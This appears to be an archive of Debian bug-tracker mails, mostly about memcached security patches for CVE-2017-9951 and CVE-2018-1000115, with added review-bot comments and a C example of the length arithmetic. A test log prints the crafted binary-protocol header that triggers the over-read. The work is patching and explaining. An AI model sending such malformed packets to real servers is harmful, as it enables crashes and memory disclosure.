Bug#873758: stretch-pu: package memcached/1.4.33-1
Hi,

I'm sorry I haven't found a sponsor to upload the security fix for CVE-2017-9951 yet.
There is another fix that needs to be uploaded to security: CVE-2018-1000115:

$ dpkg --list memcached
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name Version Architecture Description
+++-=-===-===-===
ii memcached 1.4.33-1 amd64 high-performance memory object caching system
$ sudo netstat -ltunp | grep memcached
tcp 0 0 0.0.0.0:11211 0.0.0.0:* LISTEN 31885/memcached
tcp6 0 0 :::11211 :::* LISTEN 31885/memcached
udp 0 0 0.0.0.0:11211 0.0.0.0:* 31885/memcached
udp6 0 0 :::11211 :::* 31885/memcached

Versus:

$ dpkg --list memcached
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name Version Architecture Description
+++-=-===-===-===
ii memcached 1.4.33-1+deb9u1 amd64 high-performance memory object caching system
$ sudo netstat -ltunp | grep memcached
tcp 0 0 0.0.0.0:11211 0.0.0.0:* LISTEN 478/memcached
tcp6 0 0 :::11211 :::* LISTEN 478/memcached

Please find attached the following debdiff.

--
Guillaume Delacour

diff -Nru memcached-1.4.33/debian/changelog memcached-1.4.33/debian/changelog --- memcached-1.4.33/debian/changelog 2016-11-03 01:50:27.0 +0100 +++ memcached-1.4.33/debian/changelog 2018-03-08 13:46:07.0 +0100
@@ -1,3 +1,15 @@ +memcached (1.4.33-1+deb9u1) stretch; urgency=high + + * Fix CVE-2017-9951 by checking the integer length of commands that adds or +replaces key/value pair + * Fix CVE-2018-1000115 ++ debian/patches/10_CVE-2018-1000115.patch disable listening on UDP port by + default (from Ubuntu) ++ debian/NEWS add explanation and document how to re-enable UDP if + necessary. + + -- Guillaume Delacour <g...@iroqwa.org> Thu, 08 Mar 2018 13:46:07 +0100 + memcached (1.4.33-1) unstable; urgency=medium * New upstream release, fix CVE-2016-8704, CVE-2016-8705, CVE-2016-8706 diff -Nru memcached-1.4.33/debian/NEWS memcached-1.4.33/debian/NEWS --- memcached-1.4.33/debian/NEWS 2016-07-02 10:24:46.0 +0200 +++ memcached-1.4.33/debian/NEWS 2018-03-08 13:46:07.0 +0100 @@ -1,3 +1,11 @@ +memcached (1.4.33-1+deb9u1) stretch; urgency=high + + * memcached is now configured to disable its UDP port by default, to +prevent its use as a DDoS amplifier. To re-enable UDP service, add +'-U 11211' to /etc/memcached.conf and restart the memcached service. + + -- Steve Beattie <sbeat...@ubuntu.com> Fri, 02 Mar 2018 12:52:44 -0800 + memcached (1.4.20-1) unstable; urgency=medium Starting with this release, a system user "memcache" will be created. diff -Nru memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch --- memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 1970-01-01 01:00:00.0 +0100 +++ memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 2018-03-06 21:44:06.0 +0100 
@@ -0,0 +1,36 @@ +From: dormando <dorma...@rydia.net> +Date: Tue, 4 Jul 2017 00:32:39 -0700 +Subject: [PATCH] sanity check (CVE-2017-9951) +Origin: upstream, https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167 + +--- + items.c | 2 ++ + memcached.c | 2 +- + 2 files changed, 3 insertions(+), 1 deletion(-) + +diff --git a/items.c b/items.c +index 637e5e745..83a2ea37d 100644 +--- a/items.c b/items.c +@@ -368,6 +368,8 @@ void item_free(item *it) { + bool item_size_ok(const size_t nkey, const int flags, const int nbytes) { + char prefix[40]; + uint8_t nsuffix; ++if (nbytes < 2) ++return false; + + size_t ntotal = item_make_header(nkey + 1, flags, nbytes, + prefix, ); +diff --git a/memcached.c b/memcached.c +index 0f0335795..a89df965d 1
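Review bot: in the debian/changelog hunk, neither the CVE-2017-9951 bullet nor the CVE-2018-1000115 bullet closes a bug, although both issues have reports in the BTS (#868701 and #891907); adding "(Closes: #868701)" and "(Closes: #891907)" to the respective bullets would tie this upload to them. In the debian/NEWS hunk, the entry is headed 1.4.33-1+deb9u1 for stretch but keeps the Ubuntu trailer (Steve Beattie, 02 Mar 2018), which is dated before the changelog entry it belongs to; sign it as the uploader with the changelog date and keep the Ubuntu credit in the changelog bullet, where it already is.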
Bug#891907: memcached should disable UDP by default
Hi,

On 02/03/2018 at 12:39, Hanno Böck wrote:
> Package: memcached
> Version: 1.4.33-1
>
> Memcached is currently involved in some massive ddos attacks, see e.g.:
> https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
>
> The UDP protocol of memcached can be abused for very effective DDoS
> amplification attacks and should therefore be considered dangerous.
> Upstream memcached has reacted to this by disabling UDP by default:
> https://github.com/memcached/memcached/wiki/ReleaseNotes156
>
> In Debian memcached by default only listens to 127.0.0.1, but enables
> UDP. While the localhost-only protects default settings, it's still
> only a minor change away from creating an effective DDoS tool for a
> protocol that is hardly in use today. I recommend that you backport
> the upstream change and disable UDP by default.
>

The version 1.5.6 will be uploaded in the archive in a few days.
I'll try to propose a backport patch at least for versions in stretch
and jessie (with upstream review, if possible).

--
Guillaume Delacour
Bug#863517: sslh systemd service file doesn't honor /etc/default/sslh
Hi,

On 28/05/2017 at 00:09, Cord Beermann wrote:
> Package: sslh
> Version: 1.18-1
> Severity: normal
>
> Hello,
>
> I want to use sslh.service with the sslh-select option, but in
> /lib/systemd/system/sslh.service is /usr/sbin/sslh hardcoded.
>
> It should use the information in /etc/default/sslh instead (or switch over
> to update-alternatives?)

systemd does not support a variable in ExecStart:

# service sslh status
● sslh.service - SSL/SSH multiplexer
   Loaded: error (Reason: Invalid argument)
[...]
[/lib/systemd/system/sslh.service:8] Executable path is not absolute, ignoring: $DAEMON --foreground $DAEMON_OPTS

One other way is to wrap the startup, or use alternative. I'll look into this.

>
> Cord
>
> -- System Information:
> Debian Release: 8.8
> APT prefers stable
> APT policy: (999, 'stable'), (799, 'stable-updates'), (798,
> 'proposed-updates'), (500, 'oldstable'), (299, 'testing'), (199, 'unstable'),
> (1, 'experimental')
> Architecture: amd64 (x86_64)
>
> Kernel: Linux 4.9.0-0.bpo.3-amd64 (SMP w/2 CPU cores)
> Locale: LANG=C.UTF-8, LC_CTYPE=C.UTF-8 (charmap=UTF-8)
> Shell: /bin/sh linked to /bin/dash
> Init: systemd (via /run/systemd/system)
>
> Versions of packages sslh depends on:
> ii adduser 3.113+nmu3
> ii debconf 1.5.56
> ii init-system-helpers 1.22
> ii libc6 2.19-18+deb8u9
> ii libcap2 1:2.24-8
> ii libconfig9 1.4.9-2
> ii libwrap0 7.6.q-25
> ii lsb-base 4.1+Debian13+nmu1
> ii update-inetd 4.43
>
> Versions of packages sslh recommends:
> ii apache2 [httpd] 2.4.10-10+deb8u8
> ii openssh-server [ssh-server] 1:6.7p1-5+deb8u3
>
> Versions of packages sslh suggests:
> ii openbsd-inetd [inet-superserver] 0.20140418-2
>
> -- debconf information:
> * sslh/inetd_or_standalone: standalone
>

--
Guillaume Delacour
Bug#888529: memcached: Systemd private tmp breaks unix socket access to memcached
tags 888529 + moreinfo
thanks

Hi,

On 26/01/2018 at 19:57, Dennis Boone wrote:
> Package: memcached
> Version: 1.5.4-1
> Severity: important
>
> After applying this version the other night, our application was no
> longer able to connect to memcached via its unix socket. (Since the
> systemd private tmp functionality is a damned rootkit, it took a while to
> diagnose this problem.) The distributed configuration file appears to
> place the unix socket in /tmp.

The distributed configuration file does not provide a socket file enabled; where is the socket you've defined with options "-s, --unix-socket="?
Provided config files:
https://anonscm.debian.org/cgit/collab-maint/memcached.git/tree/debian/memcached.conf
&& https://github.com/memcached/memcached/blob/master/scripts/memcached.service
&& https://anonscm.debian.org/cgit/collab-maint/memcached.git/tree/debian/patches/02_service_wrapper.patch

>
> If systemd private tmp is to be enabled for memcached, the distributed
> configuration should place the unix socket elsewhere. Alternately,
> private tmp could be disabled for memcached.
>
>
> -- System Information:
> Debian Release: buster/sid
> APT prefers unstable
> APT policy: (500, 'unstable')
> Architecture: amd64 (x86_64)
>
> Kernel: Linux 4.14.0-3-amd64 (SMP w/8 CPU cores)
> Locale: LANG=en_US.UTF-8, LC_CTYPE=es_US.UTF-8 (charmap=UTF-8) (ignored:
> LC_ALL set to es_US.UTF-8), LANGUAGE=en_US.UTF-8 (charmap=UTF-8) (ignored:
> LC_ALL set to es_US.UTF-8)
> Shell: /bin/sh linked to /bin/bash
> Init: systemd (via /run/systemd/system)
>
> Versions of packages memcached depends on:
> ii adduser 3.116
> ii libc6 2.26-5
> ii libevent-2.1-6 2.1.8-stable-4
> ii libsasl2-2 2.1.27~101-g0780600+dfsg-3
> ii lsb-base 9.20170808
> ii perl 5.26.1-4
>
> memcached recommends no packages.
>
> Versions of packages memcached suggests:
> pn libanyevent-perl
> pn libcache-memcached-perl
> pn libmemcached
> ii libterm-readkey-perl 2.37-1+b2
> pn libyaml-perl
>
> -- no debconf information
>

--
Guillaume Delacour
Bug#870819: gdisk: New upstream version 1.0.3 available
Hi,

On Sat, 5 Aug 2017 16:12:54 +0200 Christoph Biedl <debian.a...@manchmal.in-ulm.de> wrote:
> Package: gdisk
> Version: 1.0.1-1
> Severity: normal
>
> Dear Maintainer,
>
> upstream released a new version recently. Looking into the changes I
> found the following:
>
> | Fixed a major bug that caused invalid partition tables to be generated
> | under some conditions.
>
> In my humble opinion this justifies a swift upload of the new version.
> There are also some interesting changes listed for 1.0.2

I've prepared a new version on mentors and have such bug reports against
upstream code to changes/discuss. I've asked upstream some help to triage them.
If no news is received in the next few days, I'll try to contact my sponsor
to upload the new upstream release "as is".

>
> Christoph
>

--
Guillaume Delacour
Bug#702963: gdisk doesn't align the end of partition
Hi,

On Wed, 13 Mar 2013 17:11:32 +0400 sergio <mail...@sergio.spb.ru> wrote:
> Package: gdisk
> Version: 0.8.5-1
> Severity: important
>
> gdisk doesn't align the end of partition:
>
>
> % dd if=/dev/zero of=test count=22
> % /sbin/gdisk test
>
> Command (? for help): o
> This option deletes all partitions and creates a new protective MBR.
> Proceed? (Y/N): Y
>
> Command (? for help): n
> Partition number (1-128, default 1):
> First sector (34-199968, default = 2048) or {+-}size{KMGTP}:
> Last sector (2048-199968, default = 199968) or {+-}size{KMGTP}:
>
>

Sorry for my very late answer.
Did you reproduce that on Debian 9 Stretch with release 1.0.1?
Upstream has made many improvements in this release.

--
Guillaume Delacour
Bug#778325: sgdisk --new changes given end sector parameter when using a unit for the start sector
Hi,

On Fri, 13 Feb 2015 15:31:32 + Fabian Niepelt <f.niep...@mittwald.de> wrote:
[...]
>
> I'm on Debian 7.0, amd64.
>

Sorry for the lack of answer.
Do you have the same problem on Debian Stretch with version 1.0.1?

--
Guillaume Delacour
Bug#873758: stretch-pu: package memcached/1.4.33-1
On 12/09/2017 at 22:55, Adam D. Barratt wrote:
> On Tue, 2017-09-12 at 22:52 +0200, Guillaume Delacour wrote:
>> On 30/08/2017 at 21:58, Adam D. Barratt wrote:
>>> Control: tags -1 + confirmed
>>>
>>> On Wed, 2017-08-30 at 21:33 +0200, g...@iroqwa.org wrote:
>>>> The attached patch fix CVE-2017-9951 which has been not fixed via
>>>> a DSA,
>>>> as discussed with Salvatore Bonaccorso: https://bugs.debian.org/8
>>>> 68701.
>>>
>>> +memcached (1.4.33-1+deb9u1) stretch; urgency=high
>>> +
>>> + * Non-maintainer upload by the Security Team.
>>>
>>> So far as I can tell, you're not a member of the Security Team, so
>>> this
>>> is incorrect.
>>
>> Sure, please find attached the fixed debdiff, as I'm not a member of
>> the
>> security team. I've also changed the distribution from stretch to
>> stretch-security.
>
> Why? "stretch-security" is an appropriate distribution to use for
> uploads to the security archive, in which case you should be talking to
> the Security Team, not us. Assuming you're still proposing an update
> via proposed-updates and a point release, "stretch" was correct.

Indeed, absolutely right. Updated version attached.

>
> Regards,
>
> Adam
>

--
Guillaume Delacour

diff -Nru memcached-1.4.33/debian/changelog memcached-1.4.33/debian/changelog --- memcached-1.4.33/debian/changelog 2016-11-03 01:50:27.0 +0100 +++ memcached-1.4.33/debian/changelog 2017-07-25 00:38:52.0 +0200
@@ -1,3 +1,10 @@ +memcached (1.4.33-1+deb9u1) stretch; urgency=high + + * Fix CVE-2017-9951 by checking the integer length of commands that adds or +replaces key/value pair + + -- Guillaume Delacour <g...@iroqwa.org> Tue, 25 Jul 2017 00:38:52 +0200 + memcached (1.4.33-1) unstable; urgency=medium * New upstream release, fix CVE-2016-8704, CVE-2016-8705, CVE-2016-8706 diff -Nru memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch --- memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 1970-01-01 01:00:00.0 +0100 +++ memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 2017-07-25 00:38:52.0 +0200 @@ -0,0 +1,36 @@ +From: dormando <dorma...@rydia.net> +Date: Tue, 4 Jul 2017 00:32:39 -0700 +Subject: [PATCH] sanity check (CVE-2017-9951) +Origin: upstream, https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167 + +--- + items.c | 2 ++ + memcached.c | 2 +- + 2 files changed, 3 insertions(+), 1 deletion(-) + +diff --git a/items.c b/items.c +index 637e5e745..83a2ea37d 100644 +--- a/items.c b/items.c +@@ -368,6 +368,8 @@ void item_free(item *it) { + bool item_size_ok(const size_t nkey, const int flags, const int nbytes) { + char prefix[40]; + uint8_t nsuffix; ++if (nbytes < 2) ++return false; + + size_t ntotal = item_make_header(nkey + 1, flags, nbytes, + prefix, ); +diff --git a/memcached.c b/memcached.c +index 0f0335795..a89df965d 100644 +--- a/memcached.c b/memcached.c +@@ -4967,7 +4967,7 @@ static void drive_machine(conn *c) { + + case conn_swallow: + /* we are reading sbytes and throwing them away */ +-if (c->sbytes == 0) { ++if (c->sbytes <= 0) { + conn_set_state(c, conn_new_cmd); + break; + } diff -Nru memcached-1.4.33/debian/patches/series memcached-1.4.33/debian/patches/series --- memcached-1.4.33/debian/patches/series 2016-08-21 18:48:58.0 +0200 +++ memcached-1.4.33/debian/patches/series 2017-07-25 00:38:52.0 +0200 
@@ -1,3 +1,4 @@ 01_init_script_additions.patch 04_add_init_retry.patch 07_disable_tests.patch +09_CVE-2017-9951.patch signature.asc Description: OpenPGP digital signature
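Review bot: in the items.c hunk of 09_CVE-2017-9951.patch, the new guard "if (nbytes < 2) return false;" has no comment saying what the minimum of 2 stands for, so the next person rebasing this patch has to go back to the upstream commit to find out; a one-line comment above it would do. In the memcached.c hunk, "c->sbytes <= 0" sends a negative count down the same path as a finished swallow without leaving any trace, and a verbose-mode message for the negative case would let operators see that a malformed length was received. The patch header carries Origin but no Bug-Debian field; "Bug-Debian: https://bugs.debian.org/868701" would link it to the report.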
Bug#873758: stretch-pu: package memcached/1.4.33-1
On 30/08/2017 at 21:58, Adam D. Barratt wrote:
> Control: tags -1 + confirmed
>
> On Wed, 2017-08-30 at 21:33 +0200, g...@iroqwa.org wrote:
>> The attached patch fix CVE-2017-9951 which has been not fixed via a DSA,
>> as discussed with Salvatore Bonaccorso: https://bugs.debian.org/868701.
>
> +memcached (1.4.33-1+deb9u1) stretch; urgency=high
> +
> + * Non-maintainer upload by the Security Team.
>
> So far as I can tell, you're not a member of the Security Team, so this
> is incorrect.

Sure, please find attached the fixed debdiff, as I'm not a member of the
security team. I've also changed the distribution from stretch to
stretch-security.

>
> + * Fix CVE-2017-9951 by checking the integer length of commands that adds or
> +replaces key/value pair
> +
> + -- Guillaume Delacour <g...@iroqwa.org> Tue, 25 Jul 2017 00:38:52 +0200
>
> Please go ahead, bearing in mind the above comment.

As I'm not a DD nor DM I can't upload this directly, could you do this
for me as a mentoring? I also need to provide this kind of changes for
Jessie.

>
> Regards,
>
> Adam
>

--
Guillaume Delacour

diff -Nru memcached-1.4.33/debian/changelog memcached-1.4.33/debian/changelog --- memcached-1.4.33/debian/changelog 2016-11-03 01:50:27.0 +0100 +++ memcached-1.4.33/debian/changelog 2017-07-25 00:38:52.0 +0200 @@ -1,3 +1,10 @@ +memcached (1.4.33-1+deb9u1) stretch-security; urgency=high + + * Fix CVE-2017-9951 by checking the integer length of commands that adds or +replaces key/value pair + + -- Guillaume Delacour <g...@iroqwa.org> Tue, 25 Jul 2017 00:38:52 +0200 + memcached (1.4.33-1) unstable; urgency=medium * New upstream release, fix CVE-2016-8704, CVE-2016-8705, CVE-2016-8706 diff -Nru memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch --- memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 1970-01-01 01:00:00.0 +0100 +++ memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 2017-07-25 00:38:52.0 +0200
@@ -0,0 +1,36 @@ +From: dormando <dorma...@rydia.net> +Date: Tue, 4 Jul 2017 00:32:39 -0700 +Subject: [PATCH] sanity check (CVE-2017-9951) +Origin: upstream, https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167 + +--- + items.c | 2 ++ + memcached.c | 2 +- + 2 files changed, 3 insertions(+), 1 deletion(-) + +diff --git a/items.c b/items.c +index 637e5e745..83a2ea37d 100644 +--- a/items.c b/items.c +@@ -368,6 +368,8 @@ void item_free(item *it) { + bool item_size_ok(const size_t nkey, const int flags, const int nbytes) { + char prefix[40]; + uint8_t nsuffix; ++if (nbytes < 2) ++return false; + + size_t ntotal = item_make_header(nkey + 1, flags, nbytes, + prefix, ); +diff --git a/memcached.c b/memcached.c +index 0f0335795..a89df965d 100644 +--- a/memcached.c b/memcached.c +@@ -4967,7 +4967,7 @@ static void drive_machine(conn *c) { + + case conn_swallow: + /* we are reading sbytes and throwing them away */ +-if (c->sbytes == 0) { ++if (c->sbytes <= 0) { + conn_set_state(c, conn_new_cmd); + break; + } diff -Nru memcached-1.4.33/debian/patches/series memcached-1.4.33/debian/patches/series --- memcached-1.4.33/debian/patches/series 2016-08-21 18:48:58.0 +0200 +++ memcached-1.4.33/debian/patches/series 2017-07-25 00:38:52.0 +0200 @@ -1,3 +1,4 @@ 01_init_script_additions.patch 04_add_init_retry.patch 07_disable_tests.patch +09_CVE-2017-9951.patch signature.asc Description: OpenPGP digital signature
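Review bot: the first line of the debian/changelog hunk targets stretch-security, but this request is filed as stretch-pu, that is, an update through proposed-updates and a point release; the distribution field should stay "stretch", as it was in the entry quoted at the top of this message. With stretch-security in the changelog the package would be aimed at the security archive, which is handled by a different team than the one being asked here.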
Bug#868701: memcached: CVE-2017-9951: Heap-based buffer over-read in try_read_command function
On Mon, Jul 17, 2017 at 10:34:23PM +0200, Salvatore Bonaccorso wrote:
> Please adjust the affected versions in the BTS as needed.
>

Please find attached the debdiff for Debian 9 Stretch.
Also, you can find a little test case (and results) without
(CVE-2017-9951_1.4.33.log) and with the fix (CVE-2017-9951_1.4.33_fixed.log).
I've built and tested it on a clean stretch schroot.

--
Guillaume Delacour

diff -Nru memcached-1.4.33/debian/changelog memcached-1.4.33/debian/changelog --- memcached-1.4.33/debian/changelog 2016-11-03 01:50:27.0 +0100 +++ memcached-1.4.33/debian/changelog 2017-07-25 00:38:52.0 +0200 @@ -1,3 +1,11 @@ +memcached (1.4.33-1+deb9u1) unstable; urgency=high + + * Non-maintainer upload by the Security Team. + * Fix CVE-2017-9951 by checking the integer length of commands that adds or +replaces key/value pair + + -- Guillaume Delacour <g...@iroqwa.org> Tue, 25 Jul 2017 00:38:52 +0200 + memcached (1.4.33-1) unstable; urgency=medium * New upstream release, fix CVE-2016-8704, CVE-2016-8705, CVE-2016-8706 diff -Nru memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch --- memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 1970-01-01 01:00:00.0 +0100 +++ memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 2017-07-24 21:59:20.0 +0200
@@ -0,0 +1,37 @@ +From 328629445c71e6c17074f6e9e0e3ef585b58f167 Mon Sep 17 00:00:00 2001 +From: dormando <dorma...@rydia.net> +Date: Tue, 4 Jul 2017 00:32:39 -0700 +Subject: [PATCH] sanity check +Origin: upstream, https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167 + +--- + items.c | 2 ++ + memcached.c | 2 +- + 2 files changed, 3 insertions(+), 1 deletion(-) + +diff --git a/items.c b/items.c +index 637e5e745..83a2ea37d 100644 +--- a/items.c b/items.c +@@ -368,6 +368,8 @@ void item_free(item *it) { + bool item_size_ok(const size_t nkey, const int flags, const int nbytes) { + char prefix[40]; + uint8_t nsuffix; ++if (nbytes < 2) ++return false; + + size_t ntotal = item_make_header(nkey + 1, flags, nbytes, + prefix, ); +diff --git a/memcached.c b/memcached.c +index 0f0335795..a89df965d 100644 +--- a/memcached.c b/memcached.c +@@ -4967,7 +4967,7 @@ static void drive_machine(conn *c) { + + case conn_swallow: + /* we are reading sbytes and throwing them away */ +-if (c->sbytes == 0) { ++if (c->sbytes <= 0) { + conn_set_state(c, conn_new_cmd); + break; + } diff -Nru memcached-1.4.33/debian/patches/series memcached-1.4.33/debian/patches/series --- memcached-1.4.33/debian/patches/series 2016-08-21 18:48:58.0 +0200 +++ memcached-1.4.33/debian/patches/series 2017-07-25 00:38:52.0 +0200 
@@ -1,3 +1,4 @@ 01_init_script_additions.patch 04_add_init_retry.patch 07_disable_tests.patch +09_CVE-2017-9951.patch <26 new auto-negotiating client connection 26: going from conn_new_cmd to conn_waiting 26: going from conn_waiting to conn_read 26: going from conn_read to conn_parse_cmd 26: Client using the binary protocol <26 Read binary protocol data: <260x80 0x12 0x00 0x01 <260x08 0x00 0x00 0x00 <260xff 0xff 0xff 0xe8 <260x00 0x00 0x00 0x00 <260x00 0x00 0x00 0x00 <260x00 0x00 0x00 0x00 26: going from conn_parse_cmd to conn_nread <26 ADD x Value len is -33 >26 Writing an error: Out of memory allocating item >26 Writing bin response: >26 0x81 0x12 0x00 0x00 >26 0x00 0x00 0x00 0x82 >26 0x00 0x00 0x00 0x1d >26 0x00 0x00 0x00 0x00 >26 0x00 0x00 0x00 0x00 >26 0x00 0x00 0x00 0x00 26: going from conn_nread to conn_mwrite 26: going from conn_mwrite to conn_swallow 26: going from conn_swallow to conn_new_cmd 26: going from conn_new_cmd to conn_parse_cmd <26 Read binary protocol data: <260x80 0x12 0x00 0x01 <260x08 0x00 0x00 0x00 <260xff 0xff 0xff 0xe8 <260x00 0x00 0x00 0x00 <260x00 0x00 0x00 0x00 <260x00 0x00 0x00 0x00 26: going from conn_parse_cmd to conn_nread <26 ADD x Value len is -33 >26 Writing an error: Out of memory allocating item >26 Writing bin response: >26 0x81 0x12 0x00 0x00 >26 0x00 0x00 0x00 0x82 >26 0x00 0x00 0x00 0x1d >26 0x00 0x00 0x00 0x00 >26 0x00 0x00 0x00 0x00 >26 0x00 0x00 0x00 0x00 26: going from conn_nread to conn_mwrite Failed to write, and not due to blocking: Broken pipe 26: going from conn_mwrite to conn_closing <26 connection closed. 26: going from conn_closing to conn_closed <26 new auto-negotiating client connection 26: going from conn_new_cmd to conn_waiting 26: going from conn_waiting to conn_read 26: going from conn_read to conn_parse_cmd 26: Client using the binary protocol <26 Read binary protocol data:
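The length arithmetic behind the "Value len is -33" line in the log above, together with the two comparisons that 09_CVE-2017-9951.patch changes, as an added example (not code from this message or from memcached). The struct and function names are hypothetical, the second header is constructed, and lengths_sane() is a stricter up-front check that goes beyond what the patch does.

```c
/* Added illustration: not memcached source code. All names are hypothetical. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define BIN_HEADER_LEN 24u
#define BIN_MAGIC_REQ  0x80u

/* The request-header fields that matter for length checking. */
struct bin_req {
    uint8_t  opcode;   /* byte 1 */
    uint16_t keylen;   /* bytes 2-3, big-endian */
    uint8_t  extlen;   /* byte 4 */
    uint32_t bodylen;  /* bytes 8-11, big-endian: extras + key + value */
};

/* Header bytes as printed after "Read binary protocol data:" in the log. */
static const uint8_t LOGGED_HEADER[BIN_HEADER_LEN] = {
    0x80, 0x12, 0x00, 0x01,  0x08, 0x00, 0x00, 0x00,
    0xff, 0xff, 0xff, 0xe8,  0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,  0x00, 0x00, 0x00, 0x00,
};

/* Constructed well-formed header: same opcode, 1-byte key, 8 extras, 5-byte value. */
static const uint8_t GOOD_HEADER[BIN_HEADER_LEN] = {
    0x80, 0x12, 0x00, 0x01,  0x08, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x0e,  0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,  0x00, 0x00, 0x00, 0x00,
};

bool parse_bin_header(const uint8_t *buf, size_t len, struct bin_req *out)
{
    if (buf == NULL || out == NULL || len < BIN_HEADER_LEN ||
        buf[0] != BIN_MAGIC_REQ)
        return false;
    out->opcode  = buf[1];
    out->keylen  = (uint16_t)((buf[2] << 8) | buf[3]);
    out->extlen  = buf[4];
    out->bodylen = ((uint32_t)buf[8] << 24) | ((uint32_t)buf[9] << 16) |
                   ((uint32_t)buf[10] << 8) | (uint32_t)buf[11];
    return true;
}

/* Value length when the 32-bit body length is held in a signed int:
 * 0xffffffe8 becomes -24, and subtracting key + extras gives the logged -33. */
int64_t value_len_signed(const struct bin_req *h)
{
    int64_t body = (int64_t)h->bodylen;
    if (body > INT32_MAX)
        body -= INT64_C(4294967296);   /* two's-complement reinterpretation */
    return body - ((int64_t)h->keylen + (int64_t)h->extlen);
}

/* Same comparison as the guard the patch adds to item_size_ok(). */
bool item_len_ok_patched(int64_t nbytes) { return nbytes >= 2; }

/* The conn_swallow exit test before and after the patch. */
bool swallow_done_unpatched(int64_t sbytes) { return sbytes == 0; }
bool swallow_done_patched(int64_t sbytes)   { return sbytes <= 0; }

/* Beyond the patch: reject the header before any subtraction happens. */
bool lengths_sane(const struct bin_req *h, uint32_t max_body)
{
    uint32_t fixed = (uint32_t)h->keylen + (uint32_t)h->extlen;
    return h->bodylen <= max_body && h->bodylen >= fixed;
}

int main(void)
{
    struct bin_req h;
    if (!parse_bin_header(LOGGED_HEADER, sizeof LOGGED_HEADER, &h))
        return 1;
    long long vlen = (long long)value_len_signed(&h);
    printf("opcode=0x%02x keylen=%u extlen=%u bodylen=0x%08lx\n",
           (unsigned)h.opcode, (unsigned)h.keylen, (unsigned)h.extlen,
           (unsigned long)h.bodylen);
    printf("value length as signed int: %lld\n", vlen);
    printf("patched item guard accepts: %d\n", item_len_ok_patched(vlen));
    printf("swallow done (== 0): %d, (<= 0): %d\n",
           swallow_done_unpatched(vlen), swallow_done_patched(vlen));
    printf("up-front length check passes: %d\n", lengths_sane(&h, 1u << 20));
    return 0;
}
```

With the old "== 0" test a negative count never reads as finished, which is the state the one-character change in the memcached.c hunk closes off.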
Bug#868701: memcached: CVE-2017-9951: Heap-based buffer over-read in try_read_command function
On Mon, Jul 17, 2017 at 10:34:23PM +0200, Salvatore Bonaccorso wrote:
>
> Please adjust the affected versions in the BTS as needed.

Please find attached the debdiff for Debian 8 Jessie.
Also, you can find a little test case (and results) without
(CVE-2017-9951_exploit.log) and with the fix (CVE-2017-9951_fixed.log).
I've built and tested it on a clean jessie schroot.

>
> Regards,
> Salvatore
>

--
Guillaume Delacour

diff -Nru memcached-1.4.21/debian/changelog memcached-1.4.21/debian/changelog --- memcached-1.4.21/debian/changelog 2016-11-01 21:10:45.0 + +++ memcached-1.4.21/debian/changelog 2017-07-24 20:07:10.0 + @@ -1,3 +1,11 @@ +memcached (1.4.21-1.1+deb8u2) unstable; urgency=high + + * Non-maintainer upload by the Security Team. + * Fix CVE-2017-9951 by checking the integer length of commands that adds or +replaces key/value pair + + -- Guillaume Delacour <g...@iroqwa.org> Mon, 24 Jul 2017 19:54:18 + + memcached (1.4.21-1.1+deb8u1) jessie-security; urgency=high * Non-maintainer upload by the Security Team. diff -Nru memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch --- memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch 1970-01-01 00:00:00.0 + +++ memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch 2017-07-24 19:59:20.0 +
@@ -0,0 +1,37 @@ +From 328629445c71e6c17074f6e9e0e3ef585b58f167 Mon Sep 17 00:00:00 2001 +From: dormando <dorma...@rydia.net> +Date: Tue, 4 Jul 2017 00:32:39 -0700 +Subject: [PATCH] sanity check +Origin: upstream, https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167 + +--- + items.c | 2 ++ + memcached.c | 2 +- + 2 files changed, 3 insertions(+), 1 deletion(-) + +diff --git a/items.c b/items.c +index 637e5e745..83a2ea37d 100644 +--- a/items.c b/items.c +@@ -368,6 +368,8 @@ void item_free(item *it) { + bool item_size_ok(const size_t nkey, const int flags, const int nbytes) { + char prefix[40]; + uint8_t nsuffix; ++if (nbytes < 2) ++return false; + + size_t ntotal = item_make_header(nkey + 1, flags, nbytes, + prefix, ); +diff --git a/memcached.c b/memcached.c +index 0f0335795..a89df965d 100644 +--- a/memcached.c b/memcached.c +@@ -4967,7 +4967,7 @@ static void drive_machine(conn *c) { + + case conn_swallow: + /* we are reading sbytes and throwing them away */ +-if (c->sbytes == 0) { ++if (c->sbytes <= 0) { + conn_set_state(c, conn_new_cmd); + break; + } diff -Nru memcached-1.4.21/debian/patches/series 